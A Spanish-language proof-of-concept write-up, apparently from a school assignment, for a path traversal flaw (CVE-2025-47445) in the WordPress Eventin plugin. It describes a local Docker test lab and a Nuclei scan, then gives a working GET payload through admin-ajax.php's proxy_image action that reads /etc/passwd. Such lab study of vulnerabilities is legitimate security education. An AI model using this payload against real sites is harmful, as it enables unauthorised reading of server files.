
Exploit de prueba de concepto para CVE-2025-47445, una vulnerabilidad de path traversal en el plugin Eventin de WordPress. Incluye instrucciones de configuración para un entorno Docker local y pasos de explotación manual.
Esta prueba de concepto se basa en una tarea escolar donde queríamos encontrar un plugin de WordPress vulnerable y probar dicha vulnerabilidad en un entorno controlado local.
| Info | |
|---|---|
| Plugin de WordPress: | Wordpress Eventin |
| Versión del plugin: | 4.0.26 (o anterior) |
| Información del CVE: | Project Discovery - Vulnerability library |
| CVEdetails.com | |
| Herramientas de interés: | Wordfence Lab Environment |
| Docker | |
| Burp Suite | |
| Nuclei |
Worfence Docker WordPress Research Lab viene con dos entornos diferentes, uno con una versión anterior de PHP; optaremos por el más reciente.
# In the dockerwp84 folder
docker-compose build
docker-compose up -d
Después de esto, configuré la página de WordPress a través de localhost:1337. Descargué el plugin Eventin, específicamente la versión 4.0.26 desde la tienda de plugins, y lo instalé y activé a través de la interfaz de WordPress.
Ahora todo debería estar listo.
Quiero ver si Nuclei puede encontrar el CVE que busco, así que ejecuto una instancia a través de un contenedor Docker temporal.
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
He intentado ejecutar Nuclei varias veces y obtuve diferentes resultados, no estoy seguro de por qué. Pero eventualmente encuentra el CVE, y un par de otras cosas que no estaba buscando específicamente.

Para ver si puedo acceder al archivo /etc/passwd, simplemente ingreso el siguiente payload en mi solicitud GET.
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
Y fue un éxito.

Esto se hizo con fines educativos.
Asegúrate de actualizar todo tu software. Se encuentran nuevos CVE cada día.